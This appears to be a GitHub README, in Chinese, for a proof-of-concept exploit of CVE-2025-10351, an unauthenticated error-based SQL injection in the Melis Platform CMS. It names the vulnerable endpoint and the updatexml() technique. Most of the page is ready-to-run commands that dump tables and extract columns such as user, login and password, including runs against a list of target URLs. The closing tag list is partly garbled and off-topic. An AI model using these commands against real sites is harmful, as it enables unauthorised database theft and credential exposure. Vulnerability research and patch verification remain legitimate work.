ivansmc00/CVE-2025-10351-POC

GitHub: ivansmc00/CVE-2025-10351-POC

针对 Melis Platform 框架 CVE-2025-10351 SQL 注入漏洞的概念验证工具,支持无认证情况下通过报错型注入提取数据库表结构和数据。

Stars: 1 | Forks: 0

# CVE-2025-10351 POC - SQL 注入漏洞利用 💉 ![status](https://img.shields.io/badge/status-fully%20working-brightgreen) ![python](https://img.shields.io/badge/python-3.8%2B-blue) ![status](https://img.shields.io/badge/status-proof%20of%20concept-orange) ## 🔗 参考资料 - 📄 [MITRE 上的 CVE-2025-10351](https://www.cve.org/CVERecord?id=CVE-2025-10351) - 📄 [INCIBE(西班牙国家网络安全研究所)关于 Melis Platform 的警告](https://www.incibe.es/incibe-cert/alerta-temprana/avisos/multiples-vulnerabilidades-en-melis-platform) ## 🚀 描述 此 POC 针对以下端点中的 **未经身份验证的报错型 SQL 注入** 漏洞: ``` melis/MelisCms/PageEdition/getTinyTemplates?idPage= ``` 它利用 MySQL 中的 `updatexml()` 来提取: - 表名 - 列名 - 来自特定列或所有列的数据 它还检测可能的 **时间盲注** 向量,以便进一步手动利用。 ## 🛠️ 环境要求 使用以下命令安装依赖: ``` pip3 install -r requirements.txt ``` ## 🧪 用法 ### 基础检查 ``` python3 CVE-2025-10351-POC.py -u http://target.com -p 80 ``` ### 从 URL 列表运行 ``` python3 CVE-2025-10351-POC.py -l targets.txt ``` ### 提取所有表名 ``` python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at ``` ### 从表中提取所有列名 ``` python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users ``` ### 提取所有列的所有数据 ``` python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac ``` ### 提取特定列 ``` python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password ``` ### 使用代理(不安全模式)、Cookie 和调试模式 ``` python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug ``` ## ⚙️ 选项 | Argument | Description | |--------------|-----------------------------------------| | `-u` | 目标 URL | | `-p` | 端口 (80, 443, 等.) | | `-l` | 包含 URL 列表的文件 | | `-s` | 时间盲注测试的延迟时间 (默认: 1s) | | `-at` | 导出所有表名 | | `-t` | 指定表名 | | `-ac` | 导出给定表的所有列 | | `-c` | 要导出的列名列表(逗号分隔) | | `--proxy` | Burp 代理 http://127.0.0.1:8080 | | `--insecure` | 使用代理连接时禁用 TLS 检查 | | `--cookie` | 用于认证请求的 Cookie | | `--debug` | 调试模式 | ## 📤 输出 - 提取的表保存至 `tables_extracted.txt` - 提取的数据保存至 `_data.txt` ## ⚠️ 免责声明 本文档仅用于授权的安全测试和修复。请**勿**对您不拥有或未获得明确测试许可的系统使用此 PoC 或复现步骤。作者不对滥用行为负责。 Made with ❤️ by Manuel Iván San Martín Castillo
标签:CISA项目, CVE, CVE-2025-10351, Exploit, Maven, Melis Platform, PNNL实验室, POC, Python, SQLi, Web安全, 帧ework漏洞, 数字签名, 数据提取, 无后门, 无服务器架构, 时间盲注, 未授权访问, 漏洞验证, 网络安全, 蓝队分析, 逆向工具, 错误注入, 隐私保护